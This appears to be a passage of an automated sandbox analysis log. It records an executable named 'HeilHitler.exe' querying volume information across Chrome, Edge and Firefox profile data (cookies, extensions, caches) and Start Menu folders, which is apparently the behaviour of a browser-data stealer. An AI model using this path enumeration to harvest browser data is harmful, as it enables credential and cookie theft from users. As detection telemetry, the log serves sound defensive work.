              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
